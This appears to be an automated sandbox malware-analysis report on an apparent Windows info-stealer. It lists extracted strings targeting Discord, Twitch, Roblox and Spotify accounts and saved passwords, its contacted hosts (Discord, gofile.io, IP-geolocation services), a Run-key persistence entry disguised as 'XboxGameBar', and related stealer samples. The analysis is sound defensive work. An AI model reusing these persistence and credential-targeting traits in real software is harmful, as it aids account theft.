                                                                                                                    https://brew.shRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://peps.python.org/pep-0681/)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campaRuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://tools.ietf.org/html/rfc6125#section-6.4.3RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://github.com/python-attrs/attrs/issues/1084)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://www.attrs.org/en/stable/changelog.htmlRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://cdn.nest.rip/uploads/413435bc-3132-4ba2-8ed0-f90323199a13.pngRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://www.variomedia.de/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://cdn.nest.rip/uploads/3578e435-81d5-48b2-ada0-58fea37d8fc0.jpguINSTAGRAM:uHISTORY:uPASSWORDS:RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://google.com/mailRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233425C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                          https://go.mRuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://github.com/pyca/cryptography/issuesRuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233426A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://www.attrs.org/RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://html4/loose.dtdRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://mahler:8092/site-updates.pyRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://cdn.discordapp.com/avatars/u.pngu.gifTRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://cdn.nest.rip/uploads/53ad50f6-06dc-4aa1-9677-ca47ce96abe2.pngwRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2680TRuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://github.com/urllib3/urllib3/issues/2920RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJpRuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://.cssRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://requests.readthedocs.ioa__url__u2.31.0a__version__l1RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.spotify.com/api/account-settings/v1/profileRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/3020aNotOpenSSLWarningaOPENSSL_VERSION_INFOTRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.pyopenssl.orgRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://ch.search.yahoXRuntimeusererVers.exe, 00000003.00000003.1667928239.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1420294470.0000022335196000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717994360.0000022335188000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1669198355.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1648622407.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1719006635.000002233518E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization).RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://i.hizliresim.com/qxnzimj.jpgaresponseausernameaemailaregionalocaleamfaaverifieduUSERNAME:avaRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://www.attrs.org/en/stable/changelog.html)RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://www.iana.org/time-zones/repository/tz-link.htmlRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                      https://www.attrs.org/en/stable/comparison.html#customization)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://cdn.nest.rip/uploads/84415d69-e663-4ba9-9112-fb2e1b80a759.jpguCREATIONRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://.jpgRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://github.com/python-attrs/attrs/issues/1107)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://github.com/python-attrs/attrs/issues/1099)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                  https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://media.discordapp.net/RuntimeusererVers.exe, 00000003.00000003.1672021008.0000022335189000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1667928239.0000022335180000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1669198355.0000022335180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://www.python.org/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://cdn.nest.rip/uploads/4686538b-da3c-416e-bc82-f71b09908cb0.pnguPRIME:uBITS:aTwtichAccountsuRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Variomedia.svgRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://github.com/python-attrs/attrs/issuesRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://gql.twitch.tv/gqlRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://github.com/facebook/zstd/blob/dev/lib/zstd.h).RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://twitter.com/RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://nuitka.net/info/segfault.htmlforRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338755146.00007FF7E225D000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                                      https://scriptkid.lolRuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://google.com/mail/RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://bugs.python.org/issue42195.RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://google.com/mail/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233426A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://github.com/python-attrs/attrs/issues/1105)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://github.com/python-attrs/attrs/issues/993)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://pypi.org/project/attrs/)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://economy.roblox.com/v1/users/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://www.openssl.org/docs/manmaster/man5/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                                                                        ip-api.comUnited States
                                                                                                                                                                                                                                        53334TUT-ASUSfalse
                                                                                                                                                                                                                                        162.159.136.232
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        162.159.138.232
                                                                                                                                                                                                                                        discord.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        45.112.123.126
                                                                                                                                                                                                                                        api.gofile.ioSingapore
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        45.112.123.227
                                                                                                                                                                                                                                        store1.gofile.ioSingapore
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        159.89.102.253
                                                                                                                                                                                                                                        geolocation-db.comUnited States
                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1556386
                                                                                                                                                                                                                                        Start date and time:2024-11-15 10:45:13 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 15m 23s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:63
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:RuntimeusererVers.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@113/224@5/7
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 40%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                        • Execution Graph export aborted for target RuntimeusererVers.exe, PID 2956 because there are no executed function
                                                                                                                                                                                                                                        • Execution Graph export aborted for target RuntimeusererVers.exe, PID 7988 because there are no executed function
                                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 5100 because it is empty
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • VT rate limit hit for: RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        04:46:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XboxGameBar C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        04:46:20API Interceptor30x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                        04:46:20API Interceptor4x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                        04:46:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XboxGameBar C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        04:46:44API Interceptor7596459x Sleep call for process: RuntimeusererVers.exe modified
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        discord.comHeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                                        file.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                        • 162.159.138.232
                                                                                                                                                                                                                                        B78DGDwttv.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                        • 162.159.135.232
                                                                                                                                                                                                                                        YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                        • 162.159.137.232
                                                                                                                                                                                                                                        cDRgXaadjD.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                                        dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                                        Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                        • 162.159.137.232
                                                                                                                                                                                                                                        00514DIRyT.exeGet hashmaliciousGO StealerBrowse
                                                                                                                                                                                                                                        • 162.159.136.232
                                                                                                                                                                                                                                        yuki.exeGet hashmaliciousLuna StealerBrowse
                                                                                                                                                                                                                                        • 162.159.138.232
                                                                                                                                                                                                                                        CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                                                                        • 162.159.135.232
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
